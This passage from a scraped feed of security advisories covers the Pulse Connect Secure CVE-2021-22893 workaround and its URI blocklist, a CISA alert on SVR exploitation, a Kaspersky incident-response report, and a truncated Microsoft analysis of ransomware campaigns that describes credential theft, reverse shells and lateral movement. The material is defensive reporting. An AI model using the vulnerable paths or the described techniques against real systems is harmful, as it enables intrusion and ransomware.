recommend reading their blog post [here](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>).\n\n## Actively exploited zero-day: CVE-2021-22893\n\nPulse Secure released [an out-of-band security advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>) Tuesday on CVE-2021-22893, a critical authentication bypass that allows remote, unauthenticated attackers to execute arbitrary code. The vulnerability **affects versions 9.0R3 and higher** of Pulse Connect Secure devices and carries a CVSSv3 base score of 10. There is no patch available\u2014FireEye\u2019s post indicated a \u201cfinal\u201d patch will be released in May\u2014but Pulse Secure released a workaround (detailed below), and Ivanti\u2019s PSIRT released a [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) that allows administrators to verify the PCS Image installed on Virtual or Hardware Appliances, check the integrity of the file system, and identify additional or modified files.\n\nAccording to [Pulse Secure\u2019s advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>), older versions of Pulse Connect Secure are not affected by CVE-2021-22893, but it bears mentioning that those running older Pulse Secure devices may be affected by several other high-profile vulnerabilities that have seen broad, sustained exploitation over the past two years (e.g., [CVE-2019-11510](<https://attackerkb.com/topics/lx3Afd7fbJ/cve-2019-11510?referrer=blog>), [CVE-2019-11539](<https://attackerkb.com/topics/9xmWr9M5KE/cve-2019-11539?referrer=blog>)).\n\n## Guidance\n\nPulse Secure has issued a workaround in the form of an XML file that mitigates CVE-2021-22893 until a more permanent patch is available. Pulse Connect Secure customers should import the `Workaround-2104.xml` file, which blocks access to the Windows File Share Browser and Pulse Secure Collaboration features on the PCS appliance. According to the company\u2019s out-of-band advisory, they are using an existing blocklist feature to disable the URL-based attack. Rapid7 researchers were able to decrypt the blocklist\u2019s URI patterns, which are as follows:\n\n * `^/+dana/+meeting`\n * `^/+dana/+fb/+smb`\n * `^/+dana-cached/+fb/+smb`\n * `^/+dana-ws/+namedusers`\n * `^/+dana-ws/+metric`\n\nIn addition to applying the workaround, customers may want to block these patterns at their network perimeter (requires an inline load balancer capable of performing SSL decryption). Pulse Secure has since updated their advisory with the unencrypted patterns. Customers with shell access to their appliance may run the following command to confirm that the blocklist is in place:\n \n \n for i in {a..e}; do /home/bin/dsget \"/vc0/config/blacklists/patch_2104-$i/content\"; done\n \n\nPulse Connect Secure customers running versions 9.0R3 and up should apply the workaround immediately, without waiting for a regular patch or maintenance cycle to occur. We would also advise running [Ivanti\u2019s Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) to examine your Pulse Connect Secure images for files that may have been maliciously altered or added. Given the high likelihood of attacker-compromised credentials, organizations should also consider resetting passwords in their environment. Ivanti recommends reviewing the configuration to ensure no service accounts can be used to authenticate. For more information on Pulse Secure device configuration best practices, see the company\u2019s [knowledge base article here](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB29805/?kA1j0000000Fil5>).\n\n## Rapid7 customers\n\n[InsightVM](<https://www.rapid7.com/products/insightvm>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) customers can assess their exposure to CVE-2021-22893 with [authenticated vulnerability checks](<https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2021-22893/>) released on Tuesday, April 20, 2021. Please note that to ensure the highest degree of accuracy, this check requires [website form credentials](<https://docs.rapid7.com/insightvm/creating-a-logon-for-web-site-form-authentication/>) to authenticate to the `/admin` page of the Pulse Connect Secure server. Customers who aren\u2019t sure whether (or where) Pulse Connect Secure is present in their environment can use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) to search for network services or operating systems containing \u2018Pulse\u2019 in their name. The Scan Engine has some unauthenticated, versionless fingerprinting capabilities for Pulse Connect Secure that do not provide the accuracy needed for a vulnerability check, but may still give a sense of potential exposure.\n\n#### Not an InsightVM or Nexpose customer? Start a free trial to scan for this vulnerability.\n\n[Get Started](<https://www.rapid7.com/trial/insightvm>)", "modified": "2021-04-21T20:10:08", "published": "2021-04-21T20:10:08", "id": "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2", "href": "https://blog.rapid7.com/2021/04/21/active-exploitation-of-pulse-connect-secure-zero-day-cve-2021-22893/", "type": "rapid7blog", "title": "Active Exploitation of Pulse Connect Secure Zero-Day (CVE-2021-22893)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-04-16T18:06:53", "bulletinFamily": "info", "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "description": "CISA, the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) have released a [Joint Cybersecurity Advisory (CSA)](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) on Russian Foreign Intelligence Service (SVR) actors scanning for and exploiting vulnerabilities to compromise U.S. and allied networks, including national security and government-related systems.\n\nSpecifically, SVR actors are targeting and exploiting the following vulnerabilities:\n\n * [CVE-2018-13379 Fortinet FortiGate VPN](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n * [CVE-2019-9670 Synacor Zimbra Collaboration Suite](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>)\n * [CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * [CVE-2019-19781 Citrix Application Delivery Controller and Gateway](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * [CVE-2020-4006 VMware Workspace ONE Access](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>)\n\nAdditionally the White House has released a [statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) formally attributing this activity and the SolarWinds supply chain compromise to SVR actors. CISA has updated the following products to reflect this attribution:\n\n * [Alert AA20-352A: APT Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>)\n * [Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)\n * [Alert AA21-077A: Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool](<https://us-cert.cisa.gov/ncas/alerts/aa21-077a>)\n * [Malware Analysis Report AR21-039A: MAR-10318845-1.v1 - SUNBURST](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a>)\n * [Malware Analysis Report AR21-039B: MAR-10320115-1.v1 - TEARDROP](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b>)\n * Table: SolarWinds and Active Directory/M365 Compromise - Detecting APT Activity from Known TTPs\n * [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise web page](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * [Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise](<https://cyber.dhs.gov/ed/21-01/>)\n\nCISA strongly encourages users and administrators to review [Joint CSA: Russian SVR Targets U.S. and Allied Networks](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) for SVR tactics, techniques, and procedures, as well as mitigation strategies.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/04/15/nsa-cisa-fbi-joint-advisory-russian-svr-targeting-us-and-allied>); we'd welcome your feedback.\n", "modified": "2021-04-16T00:00:00", "published": "2021-04-15T00:00:00", "id": "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/04/15/nsa-cisa-fbi-joint-advisory-russian-svr-targeting-us-and-allied", "type": "cisa", "title": "NSA-CISA-FBI Joint Advisory on Russian SVR Targeting U.S. and Allied Networks", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "cvelist": ["CVE-2018-7600", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-19781"], "description": "\n\n[ Download full report (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/06094905/Kaspersky_Incident-Response-Analyst_2020.pdf>)\n\nAs an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries' cyber-incident tactics and techniques used in the wild. In this report, we share our teams' conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.\n\nThe insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.\n\n## Executive summary\n\nIn 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.\n\nAnalysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.\n\nMost of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware's presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105355/sl_incident_response_01.png>)\n\n### \n\n### Verticals and industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105442/sl_incident_response_02.png>)\n\nAdversaries used a variety of initial vectors to compromise victims' environments. Initial vectors included exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. But the most common were exploitation of unpatched vulnerabilities, malicious emails, followed by brute-force attacks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110209/sl_incident_response_03.png>)\n\nIn addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.\n\nAlthough we started working on incidents the first day of a request in 70% of cases, analysis revealed that the time between attack success and its discovery varies between an average of one day in ransomware incidents to 10 days in cases of financial theft, up to 122 days in cyber-espionage and data-theft operations.\n\n## Recommendations\n\nBased on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:\n\n * Apply complex password policies\n * Avoid management interfaces exposed to the internet\n * Only allow remote access for necessary external services with multi-factor authentication \u2013 with necessary privileges only\n * Regular system audits to identify vulnerable services and misconfigurations\n * Continually tune security tools to avoid false positives\n * Apply powerful audit policy with log retention period of at least six months\n * Monitor and investigate all alerts generated by security tools\n * Patch your publicly available services immediately\n * Enhance your email protection and employee awareness\n * Forbid use of PsExec to simplify security operations\n * Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks\n * Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss\n * Back up your data frequently and on separated infrastructure\n\n \n\n## Reasons for incident response\n\nSignificant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110347/sl_incident_response_04.png>)\n\nOrganizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110436/sl_incident_response_05.png>)\n\nOne of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story "[Cities under ransomware siege](<https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/>)".\n\n \n\n## Distribution of reasons for top regions\n\nA suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. The distribution also shows that 100% of cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110519/sl_incident_response_06.png>)\n\n## Distribution of reasons for industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110612/sl_incident_response_07.png>)\n\nAlthough, different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).\n\nDetection of ransomware once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.\n\n## Initial vectors or how adversaries get in\n\nCommon initial vectors include the exploitation of vulnerabilities (0- and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not using management interfaces on the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110706/sl_incident_response_08.png>)\n\nBy linking the popular initial compromise vectors with how an incident was detected, we can see detected suspicious files were detected from malicious emails. And cases detected after file encryption mostly took place after brute-force or vulnerability exploitation attacks. \nSometimes we act as complimentary experts for a primary incident response team from the victim's organization and we have no information on all of their findings \u2013 hence the 'Unknown reasons' on the charts. Malicious emails are most likely to be detected by a variety of security toolstack, but that's not showing distrubution of 0- to 1-day vulnerabilities.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110805/sl_incident_response_09.png>)\n\nThe distribution of how long an attack went unnoticed and how an organization was compromised shows that cases that begin with vulnerability exploitation on an organization's network perimeter went unnoticed for longest. Social enginnering attacks via email were the most short-lived.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110857/sl_incident_response_10.png>)\n\n## Tools and exploits\n\n### 30% of all incidents were tied to legitimate tools\n\nIn cyberattacks, adversaries use legitimate tools which can't be detected as malicious utilities as they are often used in everyday activities. Suspicious events that blend with normal activity can be identified after deep analysis of a malicious attack and connecting the use of such tools to the incident. The top used tools are PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110943/sl_incident_response_11.png>)\n\nMost legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. PowerShell can be used virtually for any task.\n\nLet's weight those tools based on occurrence in incidents \u2013 we will also see tactics (MITRE ATT&CK) where they are usually applied.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111024/sl_incident_response_12.png>)\n\n### Exploits\n\nMost of the identified exploits in incident cases appeared in 2019 along with a well-known remote code execution vulnerability in Windows SMB service (MS17-010) being actively exploited by a large number of adversaries.\n\n**MS17-010** _SMB service in Microsoft Windows_ \nRemote code execution vulnerability that was used in several large attacks such as WannaCry, NotPetya, WannaMine, etc. | **CVE-2019-0604** _Microsoft Sharepoint_ \nRemote code execution vulnerability allows adversaries to execute arbitrary code without authentication in Microsoft Sharepoint. | **CVE-2019-19781** _Citrix Application Delivery Controller & Citrix Gateway_ \nThis vulnerability allows unauthenticated remote code execution on all hosts connected to Citrix infrastructure. \n---|---|--- \n**CVE-2019-0708** _RDP service in Microsoft Windows_ \nRemote code execution vulnerability (codename: BlueKeep) for a very widespread and, unfortunately, frequently publicly available RDP service. | **CVE-2018-7600** _Drupal_ \nRemote code execution vulnerability also known as Drupalgeddon2. Widely used in installation of backdoors, web miners and other malware on compromised web servers. | **CVE-2019-11510** _Pulse Secure SSL VPN_ \nUnauthenticated retrieval of VPN server user credentials. Instant access to victim organization through legitimate channel. \n \n## Attack duration\n\nFor a number of incidents, Kaspersky specialists have established the time period between the beginning of an adversary's activity and the end of the attack. As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.\n\n**Rush hours or days** | **Average weeks** | **Long-lasting months or longer** \n---|---|--- \nThis category includes attacks lasting up to a week. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective counteraction to these attacks is possible only by preventive methods. \nIn some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the adversary's activity. | This group includes attacks that have been developing for a week or several weeks. In most cases, this activity was aimed at the direct theft of money. Typically, the adversaries achieved their goals within a week. | Incidents that lasted more than a month were included in this group. This activity is almost always aimed at stealing sensitive data. \nSuch attacks are characterized by interchanging active and passive phases. The total duration of active phases is on average close to the duration of attacks from the previous group. \n**Common threat:** \nRansomware infection | **Common threat:** \nFinancial theft | **Common threat:** \nCyber-espionage and theft of confidential data \n**Common attack vector:**\n\n * Downloading of a malicious file by link in email\n * Downloading of a malicious file from infected site\n * Exploitation of vulnerabilities on network perimeter\n * Credentials brute-force attack\n| **Common attack vector:**\n\n * Downloading a malicious file by link in email\n * Exploitation of vulnerabilities on network perimeter\n| **Common attack vector:**\n\n * Exploitation of vulnerabilities on network perimeter \n**Attack duration (median):** \n1 day | **Attack duration (median):** \n10 days | **Attack duration (median):** \n122 days \n**Incident response duration:** \nHours to days | **Incident response duration:** \nWeeks | **Incident response duration:** \nWeeks \n \n## Operational metrics\n\n### False positives rate\n\nFalse positives in incident responses are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization doesn't have a specialist in threat hunting or they are managed by an external SOC that doesn't have the full context for an event.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111207/sl_incident_response_13.png>)\n\n### Age of attack\n\nThis is the time taken to detect an incident by an organization after an attack starts. Usually detecting the attack in the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still OK, but taking months or years is definitely bad.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111254/sl_incident_response_14.png>)\n\n## How fast we responded\n\nHow long it took us to respond after an organization contacted us. 70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111342/sl_incident_response_15.png>)\n\n## How long response took\n\nDistribution of the time required for incident response activities can vary from a few hours to months based on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111429/sl_incident_response_16.png>)\n\n## **MITRE ATT&CK tactics and techniques**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111538/sl_incident_response_17.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111649/sl_incident_response_18.png>)\n\n## Conclusion\n\nIn 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.\n\nImproved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan either on-premises or performed by a third party could have helped in stopping adversaries in the early phases of the attack chain, or start detections immediately after compromise.\n\nVarious tactics and techniques were used by adversaries to achieve their targets, trying multiple times till they succeeded. This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.\n\nAdversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.\n\nApplying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs on endpoints and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.", "modified": "2020-08-06T10:00:34", "published": "2020-08-06T10:00:34", "id": "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "href": "https://securelist.com/incident-response-analyst-report-2019/97974/", "type": "securelist", "title": "Incident Response Analyst Report 2019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2020-04-30T23:04:13", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing 